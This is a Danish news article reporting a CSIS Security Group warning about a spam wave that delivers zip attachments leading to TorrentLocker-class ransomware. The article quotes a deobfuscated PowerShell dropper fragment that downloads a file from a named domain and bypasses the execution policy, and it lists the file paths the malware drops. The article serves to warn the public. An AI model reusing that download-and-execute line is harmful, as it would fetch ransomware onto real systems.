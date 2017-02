Modtager du en mail, der ligner ovenstående billede, bør du slette beskeden med det samme. Skærmdump: CSIS Security Group.

En spambølge målrettet danske mail-modtager skyller ind over landet med filer, der kan hente ransomware på modtagerens computer. Læs her, hvad du skal passe på.

Det danske sikkerhedsselskab CSIS Security Group har flere timer torsdag i denne uge registreret en vedvarende, massiv spambølge rettet specifikt mod danske e-mailadresser.Spambølgen kommer med et vedhæftet zip-arkiv, der kan gøre stor skade på modtagerens computer.Skaden sker, hvis mail-modtageren åbner og aktiverer det vedhæftede zip-arkiv, der via Windows' PowerShell-framework vil hente ransomware iTorrentlocker-klassen, oplyser CSIS Security Group.Sikkerhedsselskabet forklarer, at ransomwaren hentes fra to specifikke domæner, hvorfra der sendes inficeret JavaScript."Powershell koden ser ud som følgende i deobfuskeret form: DownloadFile(''http://nathanaylett.com/syst.vcx'',$path) Set-ExecutionPolicy Bypass -Scope Process; $path=($env:t+$mqedu+yzahe.exe'')." skriver CSIS Security Group i sin sikkerhedsadvarsel.I CSIS Security Groups interne mail-beskyttelsesprogram er sikkerhedsniveauet hævet til 4 på en skala, hvor 5 er det højeste.Sikkerhedsselskabet forklarer, at hvis ransomwaren får adgang til mail-modtagerens computer, vil koden kopiere sig på følgende lokationer:C:\Users\[%brugerkonto%]\AppData\Local\Temp\985611.jseC:\Users\[%brugerkonto%]\AppData\Local\Temp\ysyne.exe"Den pågældende ransomware vil dernæst i vanlig stil begynde at kryptere data lokalt og på alle tilgængelige netværksdrev," lyder advarslen.Derfor bør alle være ekstra opmærksomme, når de modtager mails med vedhæftede filer, obskure links og beskeder fra ukendte adresser.